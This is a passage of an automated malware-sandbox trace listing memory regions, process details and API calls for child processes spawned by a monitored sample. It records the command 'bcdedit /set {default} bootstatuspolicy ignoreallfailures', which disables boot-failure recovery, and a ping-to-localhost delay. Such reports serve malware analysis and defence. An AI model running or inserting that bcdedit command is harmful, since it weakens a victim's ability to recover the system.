"\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28755 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28756 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 28757 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28758 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 640 os_tid = 0xb70 Process: id = "448" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x7ea16ce0" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28707 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28708 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 28709 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 28710 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 28711 start_va = 0xe90000 end_va = 0xed9fff entry_point = 0xe90000 region_type = mapped_file name = "bcdedit.exe" filename = "\\Windows\\System32\\bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe") Region: id = 28712 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28713 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28714 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28715 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 28716 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28717 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28718 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28719 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 28720 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28721 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 28722 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28723 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28724 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28725 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28726 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28727 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28728 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 639 os_tid = 0xac4 Process: id = "449" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16ce0" os_pid = "0xadc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "ping -n 10 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28759 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28760 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28761 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28762 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 28763 start_va = 0x4c0000 end_va = 0x4c7fff entry_point = 0x4c0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 28764 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28765 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28766 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28767 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28768 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28769 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28770 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28771 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28772 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 28773 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 28774 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 28775 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 28776 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28777 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28778 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 28779 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28780 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28781 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28782 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28783 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28784 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28785 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 28786 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28787 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28788 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28789 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 28790 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28791 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28792 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 28793 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 28794 start_va = 0x120000 end_va = 0x122fff entry_point = 0x120000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 28795 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 28796 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 28797 start_va = 0x370000 end_va = 0x470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 28798 start_va = 0x4d0000 end_va = 0x10cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 28799 start_va = 0x10d0000 end_va = 0x139efff entry_point = 0x10d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 28800 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 28801 start_va = 0x13a0000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 28802 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 28803 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 28804 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 28805 start_va = 0x13a0000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 28806 start_va = 0x1500000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 28837 start_va = 0x14c0000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 28838 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 28839 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 28852 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 28853 start_va = 0x1540000 end_va = 0x163ffff entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 28864 start_va = 0x16c0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 28865 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 28876 start_va = 0x13b0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 28877 start_va = 0x1440000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 28878 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 641 os_tid = 0xb90 [0195.451] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafccc | out: lpSystemTimeAsFileTime=0xafccc*(dwLowDateTime=0xa951ad60, dwHighDateTime=0x1d440a9)) [0195.451] GetCurrentProcessId () returned 0xadc [0195.451] GetCurrentThreadId () returned 0xb90 [0195.451] GetTickCount () returned 0x376e3 [0195.451] QueryPerformanceCounter (in: lpPerformanceCount=0xafcc4 | out: lpPerformanceCount=0xafcc4*=25224013973) returned 1 [0195.452] GetModuleHandleA (lpModuleName=0x0) returned 0x4c0000 [0195.452] __set_app_type (_Type=0x1) [0195.452] __p__fmode () returned 0x76b331f4 [0195.452] __p__commode () returned 0x76b331fc [0195.452] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4c2ae1) returned 0x0 [0195.452] __getmainargs (in: _Argc=0x4c50d4, _Argv=0x4c50dc, _Env=0x4c50d8, _DoWildCard=0, _StartInfo=0x4c50e8 | out: _Argc=0x4c50d4, _Argv=0x4c50dc, _Env=0x4c50d8) returned 0 [0195.452] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.489] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0195.489] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x4c5440 | out: lpWSAData=0x4c5440) returned 0 [0195.496] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xaf75c | out: phkResult=0xaf75c*=0x58) returned 0x0 [0195.496] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xaf750, lpData=0xaf758, lpcbData=0xaf754*=0x4 | out: lpType=0xaf750*=0x0, lpData=0xaf758*=0x0, lpcbData=0xaf754*=0x4) returned 0x2 [0195.496] RegCloseKey (hKey=0x58) returned 0x0 [0195.496] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xaf724*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xaf74c | out: ppResult=0xaf74c*=0x0) returned 11001 [0195.496] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xaf724*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xaf74c | out: ppResult=0xaf74c*=0x1937b0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x193878*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x1938a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x192818*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0195.628] FreeAddrInfoW (pAddrInfo=0x1937b0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x193878*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x1938a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x192818*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0195.628] Icmp6CreateFile () returned 0x198bb0 [0195.651] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1938f0 [0195.651] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x19ec28 [0195.652] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0195.652] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0xaf74c, nSize=0x0, Arguments=0xaf748 | out: lpBuffer="\x189\x19") returned 0x19 [0195.652] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x193918, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0195.652] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0195.652] _write (in: _FileHandle=1, _Buf=0x193918*, _MaxCharCount=0x19 | out: _Buf=0x193918*) returned 25 [0195.657] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0195.657] LocalFree (hMem=0x193918) returned 0x0 [0195.657] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\x189\x19") returned 0x18 [0195.657] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x193918, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0195.657] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0195.657] _write (in: _FileHandle=1, _Buf=0x193918*, _MaxCharCount=0x18 | out: _Buf=0x193918*) returned 24 [0195.658] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0195.658] LocalFree (hMem=0x193918) returned 0x0 [0195.658] SetConsoleCtrlHandler (HandlerRoutine=0x4c17ca, Add=1) returned 1 [0195.658] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0195.661] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0195.661] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0195.662] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0195.662] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0195.662] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0195.662] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0195.662] LocalFree (hMem=0x1951e0) returned 0x0 [0195.662] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0195.662] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0195.662] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0195.662] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0195.662] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0195.662] LocalFree (hMem=0x192a10) returned 0x0 [0195.662] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0195.662] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0195.662] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0195.662] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0195.663] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0195.663] LocalFree (hMem=0x198f90) returned 0x0 [0195.663] Sleep (dwMilliseconds=0x3e8) [0196.963] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0197.165] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0197.165] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0197.165] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0197.165] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0197.165] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0197.165] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0197.165] LocalFree (hMem=0x1951e0) returned 0x0 [0197.165] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0197.165] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0197.165] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0197.165] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0197.165] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0197.165] LocalFree (hMem=0x192a10) returned 0x0 [0197.165] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0197.165] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0197.165] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0197.165] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0197.169] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0197.169] LocalFree (hMem=0x198f90) returned 0x0 [0197.169] Sleep (dwMilliseconds=0x3e8) [0198.360] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0198.567] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, 